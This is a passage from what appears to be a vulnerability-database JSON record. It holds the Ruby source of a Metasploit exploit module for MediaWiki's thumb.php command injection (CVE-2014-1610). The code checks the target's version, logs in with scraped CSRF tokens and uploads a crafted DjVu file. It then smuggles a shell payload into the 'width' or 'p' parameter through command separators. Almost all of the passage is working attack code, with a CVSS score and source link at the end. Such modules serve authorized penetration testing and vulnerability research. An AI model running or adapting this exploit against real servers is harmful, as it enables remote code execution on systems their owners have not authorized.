to #{opts['redirect_uri']}.\")\n end\n\n unless response\n vprint_status(\"No response from #{full_uri}.\")\n return CheckCode::Unknown\n end\n\n # Mediawiki will give a 404 for unknown pages but still have a body\n if response.code == 200 || response.code == 404\n vprint_status(\"#{response.code} response received...\")\n\n major, minor, patch = get_version(response.body)\n\n unless major\n return CheckCode::Unknown\n end\n\n if major == 1 && (minor < 8 || minor > 22)\n return CheckCode::Safe\n elsif major == 1 && (minor == 22 && patch > 1)\n return CheckCode::Safe\n elsif major == 1 && (minor == 21 && patch > 4)\n return CheckCode::Safe\n elsif major == 1 && (minor == 19 && patch > 10)\n return CheckCode::Safe\n elsif major == 1\n return CheckCode::Appears\n else\n return CheckCode::Safe\n end\n end\n\n vprint_status(\"Received response code #{response.code} from #{full_uri}\")\n CheckCode::Unknown\n end\n\n def exploit\n uri = target_uri.path\n\n print_status(\"Grabbing version and login CSRF token...\")\n response = send_request_cgi({\n 'uri' => normalize_uri(uri, 'index.php'),\n 'vars_get' => { 'title' => 'Special:UserLogin' }\n })\n\n unless response\n fail_with(Failure::NotFound, \"Failed to retrieve webpage.\")\n end\n\n server = response['Server']\n if server && target.name =~ /automatic/i && server =~ /win32/i\n vprint_status(\"Windows platform detected: #{server}.\")\n my_platform = Msf::Module::Platform::Windows\n elsif server && target.name =~ /automatic/i\n vprint_status(\"Nix platform detected: #{server}.\")\n my_platform = Msf::Module::Platform::Unix\n else\n my_platform = target.platform.platforms.first\n end\n\n # If we have already identified a DjVu/PDF file on the server trigger\n # the exploit\n unless datastore['FILENAME'].blank?\n payload_request(uri, datastore['FILENAME'], my_platform)\n return\n end\n\n username = datastore['USERNAME']\n password = datastore['PASSWORD']\n\n major, minor, patch = get_version(response.body)\n\n # Upload CSRF added in v1.18.2\n # http://www.mediawiki.org/wiki/Release_notes/1.18#Changes_since_1.18.1\n if ((major == 1) && (minor == 18) && (patch == 0 || patch == 1))\n upload_csrf = false\n elsif ((major == 1) && (minor < 18))\n upload_csrf = false\n else\n upload_csrf = true\n end\n\n session_cookie = response.get_cookies\n\n wp_login_token = get_html_value(response.body, 'input', 'wpLoginToken', 'value')\n\n if wp_login_token.blank?\n fail_with(Failure::UnexpectedReply, \"Couldn't find login token. Is URI set correctly?\")\n else\n print_good(\"Retrieved login CSRF token.\")\n end\n\n print_status(\"Attempting to login...\")\n login = send_request_cgi({\n 'uri' => normalize_uri(uri, 'index.php'),\n 'method' => 'POST',\n 'vars_get' => {\n 'title' => 'Special:UserLogin',\n 'action' => 'submitlogin',\n 'type' => 'login'\n },\n 'cookie' => session_cookie,\n 'vars_post' => {\n 'wpName' => username,\n 'wpPassword' => password,\n 'wpLoginAttempt' => 'Log in',\n 'wpLoginToken' => wp_login_token\n }\n })\n\n if login and login.code == 302\n print_good(\"Log in successful.\")\n else\n fail_with(Failure::NoAccess, \"Failed to log in.\")\n end\n\n auth_cookie = login.get_cookies.gsub('mediawikiToken=deleted;','')\n\n # Testing v1.15.1 it looks like it has session fixation\n # vulnerability so we dont get a new session cookie after\n # authenticating. Therefore we need to include our old cookie.\n unless auth_cookie.include? 'session='\n auth_cookie << session_cookie\n end\n\n print_status(\"Getting upload CSRF token...\") if upload_csrf\n upload_file = send_request_cgi({\n 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),\n 'cookie' => auth_cookie\n })\n\n unless upload_file and upload_file.code == 200\n fail_with(Failure::NotFound, \"Failed to access file upload page.\")\n end\n\n wp_edit_token = get_html_value(upload_file.body, 'input', 'wpEditToken', 'value') if upload_csrf\n wp_upload = get_html_value(upload_file.body, 'input', 'wpUpload', 'value')\n title = get_html_value(upload_file.body, 'input', 'title', 'value')\n\n if upload_csrf && wp_edit_token.blank?\n fail_with(Failure::UnexpectedReply, \"Couldn't find upload token. Is URI set correctly?\")\n elsif upload_csrf\n print_good(\"Retrieved upload CSRF token.\")\n end\n\n upload_mime = Rex::MIME::Message.new\n\n djvu_file = ::File.read(::File.join(Msf::Config.data_directory, \"exploits\", \"cve-2014-1610\", \"metasploit.djvu\"))\n file_name = \"#{rand_text_alpha(4)}.djvu\"\n\n upload_mime.add_part(djvu_file, \"application/octet-stream\", \"binary\", \"form-data; name=\\\"wpUploadFile\\\"; filename=\\\"#{file_name}\\\"\")\n upload_mime.add_part(\"#{file_name}\", nil, nil, \"form-data; name=\\\"wpDestFile\\\"\")\n upload_mime.add_part(\"#{rand_text_alpha(4)}\", nil, nil, \"form-data; name=\\\"wpUploadDescription\\\"\")\n upload_mime.add_part(\"\", nil, nil, \"form-data; name=\\\"wpLicense\\\"\")\n upload_mime.add_part(\"1\",nil,nil, \"form-data; name=\\\"wpIgnoreWarning\\\"\")\n upload_mime.add_part(wp_edit_token, nil, nil, \"form-data; name=\\\"wpEditToken\\\"\") if upload_csrf\n upload_mime.add_part(title, nil, nil, \"form-data; name=\\\"title\\\"\")\n upload_mime.add_part(\"1\", nil, nil, \"form-data; name=\\\"wpDestFileWarningAck\\\"\")\n upload_mime.add_part(wp_upload, nil, nil, \"form-data; name=\\\"wpUpload\\\"\")\n post_data = upload_mime.to_s\n\n print_status(\"Uploading DjVu file #{file_name}...\")\n\n upload = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),\n 'data' => post_data,\n 'ctype' => \"multipart/form-data; boundary=#{upload_mime.bound}\",\n 'cookie' => auth_cookie\n })\n\n if upload and upload.code == 302 and upload.headers['Location']\n location = upload.headers['Location']\n print_good(\"File uploaded to #{location}\")\n else\n if upload.body.include? 'not a permitted file type'\n fail_with(Failure::NotVulnerable, \"Wiki is not configured for target files.\")\n else\n fail_with(Failure::UnexpectedReply, \"Failed to upload file.\")\n end\n end\n\n payload_request(uri, file_name, my_platform)\n end\n\n def payload_request(uri, file_name, my_platform)\n if my_platform == Msf::Module::Platform::Windows\n trigger = \"1)&(#{payload.encoded})&\"\n else\n trigger = \"1;#{payload.encoded};\"\n end\n\n vars_get = { 'f' => file_name }\n if file_name.include? '.pdf'\n vars_get['width'] = trigger\n elsif file_name.include? '.djvu'\n vars_get['width'] = 1\n vars_get['p'] = trigger\n else\n fail_with(Failure::BadConfig, \"Unsupported file extension: #{file_name}\")\n end\n\n print_status(\"Sending payload request...\")\n r = send_request_cgi({\n 'uri' => normalize_uri(uri, 'thumb.php'),\n 'vars_get' => vars_get\n }, 1)\n\n if r && r.code == 404 && r.body =~ /not exist/\n print_error(\"File: #{file_name} does not exist.\")\n elsif r\n print_error(\"Received response #{r.code}, exploit probably failed\")\n end\n end\n\n # The order of name, value keeps shifting so regex is painful.\n # Cant use nokogiri due to security issues\n # Cant use REXML directly as its not strict XHTML\n # So we do a filthy mixture of regex and REXML\n def get_html_value(html, type, name, value)\n return nil unless html\n return nil unless type\n return nil unless name\n return nil unless value\n\n found = nil\n html.each_line do |line|\n if line =~ /(<#{type}[^\\/]*name=\"#{name}\".*?\\/>)/i\n found = $&\n break\n end\n end\n\n if found\n doc = REXML::Document.new found\n return doc.root.attributes[value]\n end\n\n ''\n end\nend\n\n", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/mediawiki_thumb.rb"}]}